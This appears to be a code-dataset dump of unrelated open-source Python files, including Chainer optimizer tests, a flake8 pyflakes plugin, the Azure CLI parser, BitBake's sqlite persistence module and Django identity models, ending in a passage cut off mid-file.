code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
#!/usr/bin/env python2
from distutils.core import setup

# Packaging metadata for the Hivemind-enhanced fork of python-jsonrpc.
setup(
    name='python-hivemindrpc',
    version='0.1',
    description='Enhanced version of python-jsonrpc for use with Hivemind',
    long_description=open('README').read(),
    author='Jeff Garzik',
    author_email='<jgarzik@exmulti.com>',
    maintainer='Jeff Garzik',
    maintainer_email='<jgarzik@exmulti.com>',
    url='http://www.github.com/jgarzik/python-hivemindrpc',
    packages=['hivemindrpc'],
    classifiers=[
        'License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)',
        'Operating System :: OS Independent',
    ],
)
| bitcoin-hivemind/hivemind | qa/rpc-tests/python-hivemindrpc/setup.py | Python | mit | 622 |
import unittest
import numpy as np
import six
import chainer
from chainer import cuda
import chainer.functions as F
from chainer import optimizers
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
# Initialize CUDA once at import time when a usable GPU stack is present.
if cuda.available:
    cuda.init()
class LinearModel(object):
    """Two-class linear classifier on synthetic data, used to smoke-test
    optimizers: any reasonable optimizer should reach high test accuracy."""

    UNIT_NUM = 10
    BATCH_SIZE = 32
    EPOCH = 100

    def __init__(self, optimizer):
        self.model = chainer.FunctionSet(
            l=F.Linear(self.UNIT_NUM, 2)
        )
        self.optimizer = optimizer
        # Ground-truth hyperplane (w, b) that labels the synthetic samples.
        self.w = np.random.uniform(-1, 1,
                                   (self.UNIT_NUM, 1)).astype(np.float32)
        self.b = np.random.uniform(-1, 1, (1, )).astype(np.float32)

    def _train_linear_classifier(self, model, optimizer, gpu):
        def _make_label(x):
            # Label is which side of the true hyperplane the sample lies on.
            scores = (np.dot(x, self.w) + self.b).reshape((self.BATCH_SIZE, ))
            labels = np.empty_like(scores).astype(np.int32)
            labels[scores >= 0] = 0
            labels[scores < 0] = 1
            return labels

        def _make_dataset(batch_size, unit_num, gpu):
            x_data = np.random.uniform(
                -1, 1, (batch_size, unit_num)).astype(np.float32)
            t_data = _make_label(x_data)
            if gpu:
                x_data = cuda.to_gpu(x_data)
                t_data = cuda.to_gpu(t_data)
            return chainer.Variable(x_data), chainer.Variable(t_data)

        for _ in six.moves.range(self.EPOCH):
            x, t = _make_dataset(self.BATCH_SIZE, self.UNIT_NUM, gpu)
            optimizer.zero_grads()
            loss = F.softmax_cross_entropy(model.l(x), t)
            loss.backward()
            optimizer.update()

        x_test, t_test = _make_dataset(self.BATCH_SIZE, self.UNIT_NUM, gpu)
        return F.accuracy(model.l(x_test), t_test)

    def _accuracy_cpu(self):
        self.optimizer.setup(self.model)
        return self._train_linear_classifier(self.model, self.optimizer, False)

    def _accuracy_gpu(self):
        model = self.model
        optimizer = self.optimizer
        model.to_gpu()
        optimizer.setup(model)
        return self._train_linear_classifier(model, optimizer, True)

    def accuracy(self, gpu):
        """Train, then return test accuracy as a host-side value."""
        if gpu:
            return cuda.to_cpu(self._accuracy_gpu().data)
        return self._accuracy_cpu().data
class OptimizerTestBase(object):
    # Mixin: concrete subclasses implement create() to supply the optimizer
    # under test; combined with unittest.TestCase it trains LinearModel.
    def create(self):
        raise NotImplementedError()
    def setUp(self):
        self.model = LinearModel(self.create())
    # Training is stochastic, so retry a few times before declaring failure.
    @condition.retry(10)
    def test_linear_model_cpu(self):
        self.assertGreater(self.model.accuracy(False), 0.9)
    @attr.gpu
    @condition.retry(10)
    def test_linear_model_gpu(self):
        self.assertGreater(self.model.accuracy(True), 0.9)
    def test_initialize(self):
        model = self.model.model
        assert isinstance(model, chainer.FunctionSet)
        optimizer = self.create()
        optimizer.setup(model)
        # setup() must create one param/grad tuple per model parameter.
        self.assertEqual(len(optimizer.tuples), len(model.parameters))
        msg = "'params_grads' must have 'parameters' and 'gradients'"
        with self.assertRaisesRegexp(ValueError, msg):
            optimizer.setup('xxx')
class TestAdaDelta(OptimizerTestBase, unittest.TestCase):
    # AdaDelta with a non-default eps on the linear-model task.
    def create(self):
        return optimizers.AdaDelta(eps=1e-5)
class TestAdaGrad(OptimizerTestBase, unittest.TestCase):
    # AdaGrad with learning rate 0.1.
    def create(self):
        return optimizers.AdaGrad(0.1)
class TestAdam(OptimizerTestBase, unittest.TestCase):
    # Adam with alpha 0.1.
    def create(self):
        return optimizers.Adam(0.1)
class TestMomentumSGD(OptimizerTestBase, unittest.TestCase):
    # SGD with momentum, learning rate 0.1.
    def create(self):
        return optimizers.MomentumSGD(0.1)
class TestRMSprop(OptimizerTestBase, unittest.TestCase):
    # RMSprop with learning rate 0.1.
    def create(self):
        return optimizers.RMSprop(0.1)
class TestRMSpropGraves(OptimizerTestBase, unittest.TestCase):
    # Graves' variant of RMSprop, learning rate 0.1.
    def create(self):
        return optimizers.RMSpropGraves(0.1)
class TestSGD(OptimizerTestBase, unittest.TestCase):
    # Plain SGD with learning rate 0.1.
    def create(self):
        return optimizers.SGD(0.1)
# Allow running this test module directly (python test_....py).
testing.run_module(__name__, __file__)
| woodshop/chainer | tests/optimizers_tests/test_optimizers_by_linear_model.py | Python | mit | 4,152 |
# -*- coding: utf-8 -*-
# Mercurial's lazy importer interferes with pyflakes' introspection, so turn
# it off if it happens to be active in this process.
try:
    # The 'demandimport' breaks pyflakes and flake8._pyflakes
    from mercurial import demandimport
except ImportError:
    pass
else:
    demandimport.disable()
import os
import pep8
import pyflakes
import pyflakes.checker
def patch_pyflakes():
    """Attach flake8-style error codes to the Pyflakes message classes."""
    code_table = {}
    for entry in ('F401 UnusedImport',
                  'F402 ImportShadowedByLoopVar',
                  'F403 ImportStarUsed',
                  'F404 LateFutureImport',
                  'F810 Redefined',  # XXX Obsolete?
                  'F811 RedefinedWhileUnused',
                  'F812 RedefinedInListComp',
                  'F821 UndefinedName',
                  'F822 UndefinedExport',
                  'F823 UndefinedLocal',
                  'F831 DuplicateArgument',
                  'F841 UnusedVariable'):
        code, message_name = entry.split()
        code_table[message_name] = code
    # Message classes are upper-cased; unknown ones fall back to F999.
    for name, obj in vars(pyflakes.messages).items():
        if name[0].isupper() and obj.message:
            obj.flake8_msg = '%s %s' % (code_table.get(name, 'F999'),
                                        obj.message)
patch_pyflakes()
class FlakesChecker(pyflakes.checker.Checker):
    """Subclass the Pyflakes checker to conform with the flake8 API."""
    name = 'pyflakes'
    version = pyflakes.__version__

    def __init__(self, tree, filename):
        filename = pep8.normalize_paths(filename)[0]
        withDoctest = self.withDoctest
        # Includes win by default; an exclude overrides an include unless the
        # include is nested inside (i.e. more specific than) the exclude.
        included_by = [include for include in self.include_in_doctest
                       if include != '' and filename.startswith(include)]
        if included_by:
            withDoctest = True

        for exclude in self.exclude_from_doctest:
            if exclude != '' and filename.startswith(exclude):
                withDoctest = False
                overlaped_by = [include for include in included_by
                                if include.startswith(exclude)]

                if overlaped_by:
                    withDoctest = True

        super(FlakesChecker, self).__init__(tree, filename,
                                            withDoctest=withDoctest)

    @classmethod
    def add_options(cls, parser):
        parser.add_option('--builtins',
                          help="define more built-ins, comma separated")
        parser.add_option('--doctests', default=False, action='store_true',
                          help="check syntax of the doctests")
        parser.add_option('--include-in-doctest', default='',
                          dest='include_in_doctest',
                          help='Run doctests only on these files',
                          type='string')
        parser.add_option('--exclude-from-doctest', default='',
                          dest='exclude_from_doctest',
                          help='Skip these files when running doctests',
                          type='string')
        parser.config_options.extend(['builtins', 'doctests',
                                      'include-in-doctest',
                                      'exclude-from-doctest'])

    @staticmethod
    def _normalize_doctest_paths(option_value):
        """Split a comma-separated path list, anchor relative entries with
        './' and normalize the result via pep8.

        This de-duplicates the identical include/exclude handling that was
        previously copy-pasted twice in parse_options.
        """
        anchored = []
        for path in option_value.split(','):
            if path == '':
                continue
            if not path.startswith((os.sep, './', '~/')):
                anchored.append('./' + path)
            else:
                anchored.append(path)
        return pep8.normalize_paths(','.join(anchored))

    @classmethod
    def parse_options(cls, options):
        if options.builtins:
            cls.builtIns = cls.builtIns.union(options.builtins.split(','))
        cls.withDoctest = options.doctests

        cls.include_in_doctest = cls._normalize_doctest_paths(
            options.include_in_doctest)
        cls.exclude_from_doctest = cls._normalize_doctest_paths(
            options.exclude_from_doctest)

        inc_exc = set(cls.include_in_doctest).intersection(
            set(cls.exclude_from_doctest))
        if inc_exc:
            raise ValueError('"%s" was specified in both the '
                             'include-in-doctest and exclude-from-doctest '
                             'options. You are not allowed to specify it in '
                             'both for doctesting.' % inc_exc)

    def run(self):
        """Yield (line, col, message, type) tuples as flake8 expects."""
        for m in self.messages:
            col = getattr(m, 'col', 0)
            yield m.lineno, col, (m.flake8_msg % m.message_args), m.__class__
| wdv4758h/flake8 | flake8/_pyflakes.py | Python | mit | 4,605 |
# Version kept as a tuple for programmatic comparison, rendered to the
# canonical dotted string for display.
__version_info__ = (2, 4, 2)
__version__ = "%d.%d.%d" % __version_info__
| SergeyCherepanov/ansible | ansible/paramiko/_version.py | Python | mit | 80 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import argparse
import argcomplete
import azure.cli.core.telemetry as telemetry
import azure.cli.core._help as _help
from azure.cli.core.util import CLIError
from azure.cli.core._pkg_util import handle_module_not_installed
import azure.cli.core.azlogging as azlogging
logger = azlogging.get_az_logger(__name__)
class IncorrectUsageError(CLIError):
    """Error raised when a command is used incorrectly; callers catching it
    should display the usage text to the user.
    """
    pass
class CaseInsensitiveChoicesCompleter(argcomplete.completers.ChoicesCompleter):  # pylint: disable=too-few-public-methods
    """Choices completer that matches the typed prefix case-insensitively."""
    def __call__(self, prefix, **kwargs):
        lowered = prefix.lower()
        return (choice for choice in self.choices
                if choice.lower().startswith(lowered))
# Override the stock choices completer globally so every argcomplete
# completion in the CLI is case insensitive.
argcomplete.completers.ChoicesCompleter = CaseInsensitiveChoicesCompleter
def enable_autocomplete(parser):
    """Wire argcomplete up to *parser* with case-insensitive matching."""
    argcomplete.autocomplete = argcomplete.CompletionFinder()
    argcomplete.autocomplete(
        parser,
        validator=lambda choice, prefix: choice.lower().startswith(prefix.lower()),
        default_completer=lambda _: ())
class AzCliCommandParser(argparse.ArgumentParser):
    """ArgumentParser implementation specialized for the
    Azure CLI utility.
    """
    def __init__(self, **kwargs):
        # Map of command path tuple -> subparser action; () is the root.
        self.subparsers = {}
        self.parents = kwargs.get('parents', [])
        self.help_file = kwargs.pop('help_file', None)
        # We allow a callable for description to be passed in in order to delay-load any help
        # or description for a command. We better stash it away before handing it off for
        # "normal" argparse handling...
        self._description = kwargs.pop('description', None)
        self.command_source = kwargs.pop('_command_source', None)
        super(AzCliCommandParser, self).__init__(**kwargs)
    def load_command_table(self, command_table):
        """Load a command table into our parser.
        """
        # If we haven't already added a subparser, we
        # better do it.
        if not self.subparsers:
            sp = self.add_subparsers(dest='_command_package')
            sp.required = True
            self.subparsers = {(): sp}
        for command_name, metadata in command_table.items():
            subparser = self._get_subparser(command_name.split())
            command_verb = command_name.split()[-1]
            # To work around http://bugs.python.org/issue9253, we artificially add any new
            # parsers we add to the "choices" section of the subparser.
            subparser.choices[command_verb] = command_verb
            # inject command_module designer's help formatter -- default is HelpFormatter
            fc = metadata.formatter_class or argparse.HelpFormatter
            command_parser = subparser.add_parser(command_verb,
                                                  description=metadata.description,
                                                  parents=self.parents,
                                                  conflict_handler='error',
                                                  help_file=metadata.help,
                                                  formatter_class=fc,
                                                  _command_source=metadata.command_source)
            argument_validators = []
            argument_groups = {}
            for arg in metadata.arguments.values():
                if arg.validator:
                    argument_validators.append(arg.validator)
                if arg.arg_group:
                    try:
                        group = argument_groups[arg.arg_group]
                    except KeyError:
                        # group not found so create
                        group_name = '{} Arguments'.format(arg.arg_group)
                        group = command_parser.add_argument_group(
                            arg.arg_group, group_name)
                        argument_groups[arg.arg_group] = group
                    param = group.add_argument(
                        *arg.options_list, **arg.options)
                else:
                    try:
                        param = command_parser.add_argument(
                            *arg.options_list, **arg.options)
                    except argparse.ArgumentError:
                        # 'no_wait'/'raw' may collide with arguments that the
                        # parent parsers already registered; tolerate those.
                        dest = arg.options['dest']
                        if dest in ['no_wait', 'raw']:
                            pass
                        else:
                            raise
                param.completer = arg.completer
            command_parser.set_defaults(
                func=metadata,
                command=command_name,
                _validators=argument_validators,
                _parser=command_parser)
    def _get_subparser(self, path):
        """For each part of the path, walk down the tree of
        subparsers, creating new ones if one doesn't already exist.
        """
        for length in range(0, len(path)):
            parent_subparser = self.subparsers.get(tuple(path[0:length]), None)
            if not parent_subparser:
                # No subparser exists for the given subpath - create and register
                # a new subparser.
                # Since we know that we always have a root subparser (we created)
                # one when we started loading the command table, and we walk the
                # path from left to right (i.e. for "cmd subcmd1 subcmd2", we start
                # with ensuring that a subparser for cmd exists, then for subcmd1,
                # subcmd2 and so on), we know we can always back up one step and
                # add a subparser if one doesn't exist
                grandparent_subparser = self.subparsers[tuple(path[:length - 1])]
                new_parser = grandparent_subparser.add_parser(path[length - 1])
                # Due to http://bugs.python.org/issue9253, we have to give the subparser
                # a destination and set it to required in order to get a
                # meaningful error
                parent_subparser = new_parser.add_subparsers(dest='subcommand')
                parent_subparser.required = True
                self.subparsers[tuple(path[0:length])] = parent_subparser
        return parent_subparser
    def _handle_command_package_error(self, err_msg):  # pylint: disable=no-self-use
        # If parsing failed because a whole command module is missing, offer
        # to install it rather than just printing the argparse error.
        if err_msg and err_msg.startswith('argument _command_package: invalid choice:'):
            import re
            try:
                possible_module = re.search("argument _command_package: invalid choice: '(.+?)'",
                                            err_msg).group(1)
                handle_module_not_installed(possible_module)
            except AttributeError:
                # regular expression pattern match failed so unable to retrieve
                # module name
                pass
            except Exception as e:  # pylint: disable=broad-except
                logger.debug('Unable to handle module not installed: %s', str(e))
    def validation_error(self, message):
        # Record the failure category for telemetry, then use argparse's
        # normal error path (prints usage and exits).
        telemetry.set_user_fault('validation error')
        return super(AzCliCommandParser, self).error(message)
    def error(self, message):
        # Log and exit with status 2 like argparse, after giving the
        # missing-module handler a chance to intervene.
        telemetry.set_user_fault('parse error: {}'.format(message))
        self._handle_command_package_error(message)
        args = {'prog': self.prog, 'message': message}
        logger.error('%(prog)s: error: %(message)s', args)
        self.print_usage(sys.stderr)
        self.exit(2)
    def format_help(self):
        # Replaces argparse help output with the CLI's long-form help.
        is_group = self.is_group()
        telemetry.set_command_details(command=self.prog[3:])
        telemetry.set_success(summary='show help')
        _help.show_help(self.prog.split()[1:],
                        self._actions[-1] if is_group else self,
                        is_group)
        self.exit()
    def _check_value(self, action, value):
        # Override to customize the error message when an argument is not among the available choices
        # converted value must be one of the choices (if specified)
        if action.choices is not None and value not in action.choices:
            msg = 'invalid choice: {}'.format(value)
            raise argparse.ArgumentError(action, msg)
    def is_group(self):
        """ Determine if this parser instance represents a group
        or a command. Anything that has a func default is considered
        a group. This includes any dummy commands served up by the
        "filter out irrelevant commands based on argv" command filter """
        cmd = self._defaults.get('func', None)
        return not (cmd and cmd.handler)
    def __getattribute__(self, name):
        """ Since getting the description can be expensive (require module loads), we defer
        this until someone actually wants to use it (i.e. show help for the command)
        """
        if name == 'description':
            if self._description:
                self.description = self._description() \
                    if callable(self._description) else self._description
            self._description = None
        return object.__getattribute__(self, name)
| QingChenmsft/azure-cli | src/azure-cli-core/azure/cli/core/parser.py | Python | mit | 9,504 |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'functions describe' command."""
from googlecloudsdk.api_lib.functions import util
from googlecloudsdk.calliope import base
from googlecloudsdk.core import properties
class Describe(base.DescribeCommand):
    """Show description of a function."""

    @staticmethod
    def Args(parser):
        """Register flags for this command."""
        parser.add_argument(
            'name', help='The name of the function to describe.',
            type=util.ValidateFunctionNameOrRaise)

    @util.CatchHTTPErrorRaiseHTTPException
    def Run(self, args):
        """This is what gets called when the user runs this command.

        Args:
          args: an argparse namespace. All the arguments that were provided to
            this command invocation.

        Returns:
          The specified function with its description and configured filter.
        """
        client = self.context['functions_client']
        messages = self.context['functions_messages']
        project = properties.VALUES.core.project.Get(required=True)
        registry = self.context['registry']
        function_ref = registry.Parse(
            args.name,
            params={'projectsId': project, 'locationsId': args.region},
            collection='cloudfunctions.projects.locations.functions')
        # TODO(user): Use resources.py here after b/21908671 is fixed.
        request = messages.CloudfunctionsProjectsLocationsFunctionsGetRequest(
            name=function_ref.RelativeName())
        return client.projects_locations_functions.Get(request)
| Sorsly/subtle | google-cloud-sdk/lib/surface/functions/describe.py | Python | mit | 2,021 |
# -*- coding: utf-8 -*-
# Copyright (c) 2020, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class InstalledApplication(Document):
    """Doctype with no custom behaviour; everything comes from Document."""
    pass
| adityahase/frappe | frappe/core/doctype/installed_application/installed_application.py | Python | mit | 278 |
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import numpy as np
fig = plt.figure(figsize=(9, 3))

# Stereographic map used to generate a regular 30x30 lon/lat grid.
grid_map = Basemap(width=12000000, height=8000000,
                   resolution='l', projection='stere',
                   lat_ts=50, lat_0=50, lon_0=-107.)
lons, lats, x, y = grid_map.makegrid(30, 30, returnxy=True)

ax = fig.add_subplot(121)
ax.set_title('The regular grid')
grid_map.scatter(x, y, marker='o')
grid_map.drawcoastlines()

ax = fig.add_subplot(122)
ax.set_title('Projection changed')

# Re-project the same lon/lat grid onto an azimuthal equidistant map.
grid_map = Basemap(width=12000000, height=9000000, projection='aeqd',
                   lat_0=50., lon_0=-105.)
x, y = grid_map(lons, lats)
grid_map.scatter(x, y, marker='o')
grid_map.drawcoastlines()

plt.show()
"""BitBake Persistent Data Store
Used to store data in a central location such that other threads/tasks can
access them at some future date. Acts as a convenience wrapper around sqlite,
currently, providing a key/value store accessed by 'domain'.
"""
# Copyright (C) 2007 Richard Purdie
# Copyright (C) 2010 Chris Larson <chris_larson@mentor.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import collections
import logging
import os.path
import sys
import warnings
from bb.compat import total_ordering
from collections import Mapping
try:
import sqlite3
except ImportError:
from pysqlite2 import dbapi2 as sqlite3
sqlversion = sqlite3.sqlite_version_info
# Bail out early on ancient sqlite; the code below relies on features such as
# "CREATE TABLE IF NOT EXISTS" that need at least 3.3.0.
if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
    raise Exception("sqlite3 version 3.3.0 or later is required.")
logger = logging.getLogger("BitBake.PersistData")
# Shared cache is a best-effort optimization; some builds refuse it at
# runtime, hence the OperationalError guard.
if hasattr(sqlite3, 'enable_shared_cache'):
    try:
        sqlite3.enable_shared_cache(True)
    except sqlite3.OperationalError:
        pass
@total_ordering
class SQLTable(collections.MutableMapping):
    """Object representing a table/domain in the database.

    Provides a dict-like key/value interface backed by a sqlite table.
    """
    def __init__(self, cachefile, table):
        self.cachefile = cachefile
        self.table = table
        self.cursor = connect(self.cachefile)
        self._execute("CREATE TABLE IF NOT EXISTS %s(key TEXT, value TEXT);"
                      % table)

    def _execute(self, *query):
        """Execute a query, waiting to acquire a lock if necessary"""
        count = 0
        while True:
            try:
                return self.cursor.execute(*query)
            except sqlite3.OperationalError as exc:
                # Another process holds the lock: reconnect and retry a
                # bounded number of times before propagating the error.
                if 'database is locked' in str(exc) and count < 500:
                    count = count + 1
                    self.cursor.close()
                    self.cursor = connect(self.cachefile)
                    continue
                raise

    def __enter__(self):
        self.cursor.__enter__()
        return self

    def __exit__(self, *excinfo):
        self.cursor.__exit__(*excinfo)

    def __getitem__(self, key):
        data = self._execute("SELECT * from %s where key=?;" %
                             self.table, [key])
        for row in data:
            return row[1]
        raise KeyError(key)

    def __delitem__(self, key):
        if key not in self:
            raise KeyError(key)
        self._execute("DELETE from %s where key=?;" % self.table, [key])

    def __setitem__(self, key, value):
        if not isinstance(key, basestring):
            raise TypeError('Only string keys are supported')
        elif not isinstance(value, basestring):
            raise TypeError('Only string values are supported')
        data = self._execute("SELECT * from %s where key=?;" %
                             self.table, [key])
        exists = len(list(data))
        if exists:
            self._execute("UPDATE %s SET value=? WHERE key=?;" % self.table,
                          [value, key])
        else:
            self._execute("INSERT into %s(key, value) values (?, ?);" %
                          self.table, [key, value])

    def __contains__(self, key):
        # Query the key directly instead of materialising every key into a
        # Python set (the previous "key in set(self)" was O(table size)).
        data = self._execute("SELECT key from %s where key=?;" % self.table,
                             [key])
        for _ in data:
            return True
        return False

    def __len__(self):
        data = self._execute("SELECT COUNT(key) FROM %s;" % self.table)
        for row in data:
            return row[0]

    def __iter__(self):
        data = self._execute("SELECT key FROM %s;" % self.table)
        return (row[0] for row in data)

    def __lt__(self, other):
        # BUGFIX: the original did "raise NotImplemented", but NotImplemented
        # is not an exception and cannot be raised; the comparison protocol
        # expects it to be *returned* so Python can try the reflected op.
        if not isinstance(other, Mapping):
            return NotImplemented
        return len(self) < len(other)

    def values(self):
        return list(self.itervalues())

    def itervalues(self):
        data = self._execute("SELECT value FROM %s;" % self.table)
        return (row[0] for row in data)

    def items(self):
        return list(self.iteritems())

    def iteritems(self):
        return self._execute("SELECT * FROM %s;" % self.table)

    def clear(self):
        self._execute("DELETE FROM %s;" % self.table)

    def has_key(self, key):
        return key in self
class PersistData(object):
    """Deprecated representation of the bitbake persistent data store"""
    def __init__(self, d):
        warnings.warn("Use of PersistData is deprecated. Please use "
                      "persist(domain, d) instead.",
                      category=DeprecationWarning,
                      stacklevel=2)
        # NOTE(review): persist() is defined as persist(domain, d); this
        # one-argument call looks stale -- confirm before relying on it.
        self.data = persist(d)
        # NOTE(review): SQLTable exposes 'cachefile', not 'filename' --
        # this debug line may be stale as well; verify.
        logger.debug(1, "Using '%s' as the persistent data cache",
                     self.data.filename)
    def addDomain(self, domain):
        """
        Add a domain (pending deprecation)
        """
        return self.data[domain]
    def delDomain(self, domain):
        """
        Removes a domain and all the data it contains
        """
        del self.data[domain]
    def getKeyValues(self, domain):
        """
        Return a list of key + value pairs for a domain
        """
        return self.data[domain].items()
    def getValue(self, domain, key):
        """
        Return the value of a key for a domain
        """
        return self.data[domain][key]
    def setValue(self, domain, key, value):
        """
        Sets the value of a key for a domain
        """
        self.data[domain][key] = value
    def delValue(self, domain, key):
        """
        Deletes a key/value pair
        """
        del self.data[domain][key]
def connect(database):
    """Open *database* in autocommit mode (isolation_level=None) with a 5s
    busy timeout; SQLTable._execute additionally retries on lock errors."""
    return sqlite3.connect(database, timeout=5, isolation_level=None)
def persist(domain, d):
    """Convenience factory for SQLTable objects based upon metadata"""
    import bb.utils
    # Prefer PERSISTENT_DIR, falling back to CACHE.
    cachedir = (d.getVar("PERSISTENT_DIR", True) or
                d.getVar("CACHE", True))
    if not cachedir:
        logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
        sys.exit(1)
    bb.utils.mkdirhier(cachedir)
    cachefile = os.path.join(cachedir, "bb_persist_data.sqlite3")
    return SQLTable(cachefile, domain)
| sentient-energy/emsw-bitbake-mirror | lib/bb/persist_data.py | Python | gpl-2.0 | 6,609 |
from django.db import models
from django.core.validators import validate_email, validate_slug, validate_ipv46_address
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from ava.core.models import TimeStampedModel
from ava.core_group.models import Group
from ava.core_identity.validators import validate_skype, validate_twitter
class Identity(TimeStampedModel):
    # An identity is an online persona that can map to a single person, a group
    # of people, or an automated service.
    # Values stored in identity_type.
    GROUP = 'GROUP'
    PERSON = 'PERSON'
    IDENTITY_TYPE_CHOICES = (
        (GROUP, 'Group'),
        (PERSON, 'Person'),
    )
    # Display name and free-form description; both optional.
    name = models.CharField(max_length=100, verbose_name='Name', null=True, blank=True)
    description = models.TextField(max_length=500, verbose_name='Description', null=True, blank=True)
    identity_type = models.CharField(max_length=10,
                                     choices=IDENTITY_TYPE_CHOICES,
                                     default=PERSON,
                                     verbose_name='Identity Type')
    groups = models.ManyToManyField(Group,
                                    blank=True,
                                    related_name='identities')
    def __str__(self):
        # Fall back to '' so displays never render "None".
        return self.name or ''
    def get_absolute_url(self):
        return reverse('identity-detail', kwargs={'pk': self.id})
    class Meta:
        verbose_name = 'identity'
        verbose_name_plural = 'identities'
        ordering = ['name']
class Person(TimeStampedModel):
    # A real-world person; may be associated with any number of identities.
    first_name = models.CharField(max_length=75, validators=[validate_slug])
    surname = models.CharField(max_length=75, validators=[validate_slug])
    identity = models.ManyToManyField('Identity', blank=True)
    def __str__(self):
        # strip() handles the case where either name part is empty.
        return (self.first_name + " " + self.surname).strip() or ''
    def get_absolute_url(self):
        return reverse('person-detail', kwargs={'pk': self.id})
    class Meta:
        verbose_name = 'person'
        verbose_name_plural = 'people'
        ordering = ['surname', 'first_name']
class Identifier(TimeStampedModel):
    """
    A single identifying attribute (email address, IP, username, Skype or
    Twitter handle, ...) attached to an Identity.
    """
    EMAIL = 'EMAIL'
    SKYPE = 'SKYPE'
    IP = 'IPADD'
    UNAME = 'UNAME'
    TWITTER = 'TWITTER'
    NAME = 'NAME'
    IDENTIFIER_TYPE_CHOICES = (
        (EMAIL, 'Email Address'),
        (SKYPE, 'Skype ID'),
        (IP, 'IP Address'),
        (UNAME, 'Username'),
        (TWITTER, 'Twitter ID'),
        (NAME, 'Other name'),
    )
    identifier = models.CharField(max_length=100)
    identifier_type = models.CharField(max_length=10,
                                       choices=IDENTIFIER_TYPE_CHOICES,
                                       default=EMAIL,
                                       verbose_name='Identifier Type')
    identity = models.ForeignKey('Identity', related_name='identifiers')
    def __str__(self):
        return self.identifier or ''
    def get_absolute_url(self):
        return reverse('identifier-detail', kwargs={'pk': self.id})
    def clean(self):
        """Validate ``identifier`` against the format implied by its type.

        BUGFIX: the original compared strings with ``is`` (identity), which
        depends on CPython string interning and is not guaranteed to be True
        for equal strings -- validation could silently be skipped.  Compare
        with ``==`` via a type -> (validator, message) dispatch table instead.
        """
        validators = {
            self.EMAIL: (validate_email,
                         'Identifier is not a valid email address'),
            self.IP: (validate_ipv46_address,
                      'Identifier is not a valid IPv4/IPv6 address'),
            self.UNAME: (validate_slug,
                         'Identifier is not a valid username or name'),
            self.NAME: (validate_slug,
                        'Identifier is not a valid username or name'),
            self.SKYPE: (validate_skype,
                         'Identifier is not a valid Skype user name'),
            self.TWITTER: (validate_twitter,
                           'Identifier is not a valid Twitter user name'),
        }
        entry = validators.get(self.identifier_type)
        if entry is not None:
            validator, message = entry
            try:
                validator(self.identifier)
            except ValidationError:
                raise ValidationError(message)
    class Meta:
        unique_together = ("identifier", "identifier_type", "identity")
        ordering = ['identifier', 'identifier_type']
| cnbird1999/ava | ava/core_identity/models.py | Python | gpl-2.0 | 4,406 |
import math
def square_root(a):
    """Compute the square root of *a* with Newton's method.

    Args:
        a: a non-negative number.

    Returns:
        An approximation of sqrt(a), iterated until successive estimates
        differ by less than ~1e-12.

    Raises:
        ValueError: if *a* is negative (the iteration would never converge;
            the original code also divided by zero for a == 0).
    """
    if a < 0:
        raise ValueError("square_root() requires a non-negative argument")
    if a == 0:
        return 0.0
    epsilon = 0.1e-11  # convergence tolerance (typo 'espilon' fixed)
    x = a
    while True:
        y = (x + a / x) / 2.0
        if abs(y - x) < epsilon:
            return y
        x = y
def test_square_root():
    """Compares custom square_root and math.sqrt for a = 1..9.
    """
    # Python 2 print statements: show a, our result, math.sqrt's result,
    # and the absolute difference between the two.
    a = 1.0
    while a < 10.0:
        print a, '{:<13}'.format( square_root( a ) ), \
              '{:<13}'.format( math.sqrt( a ) ), \
              abs( square_root( a ) - math.sqrt( a ) )
        a += 1
test_square_root()
| hacpai/show-me-the-code | Python/0033/main.py | Python | gpl-2.0 | 540 |
import os
import unittest
import mock
from pulp.server.db import connection
class PulpWebservicesTests(unittest.TestCase):
    """
    Base class for tests of webservice controllers.  This base works around
    the authentication checks performed for each webservice method.
    """

    def setUp(self):
        connection.initialize()
        # Patch out authentication, HTTP plumbing and the manager factory so
        # controller code can be exercised without a running server.
        self.patch1 = mock.patch('pulp.server.webservices.controllers.decorators.'
                                 'check_preauthenticated')
        self.patch2 = mock.patch('pulp.server.webservices.controllers.decorators.'
                                 'is_consumer_authorized')
        self.patch3 = mock.patch('pulp.server.webservices.http.resource_path')
        self.patch4 = mock.patch('pulp.server.webservices.http.header')
        self.patch5 = mock.patch('web.webapi.HTTPError')
        self.patch6 = mock.patch('pulp.server.managers.factory.principal_manager')
        self.patch7 = mock.patch('pulp.server.managers.factory.user_query_manager')
        self.patch8 = mock.patch('pulp.server.webservices.http.uri_path')
        # Keep every patcher in one list so tearDown stops them all without
        # the previous copy-pasted stop() calls.
        self._patchers = [self.patch1, self.patch2, self.patch3, self.patch4,
                          self.patch5, self.patch6, self.patch7, self.patch8]

        self.mock_check_pre_auth = self.patch1.start()
        self.mock_check_pre_auth.return_value = 'ws-user'
        self.mock_check_auth = self.patch2.start()
        self.mock_check_auth.return_value = True
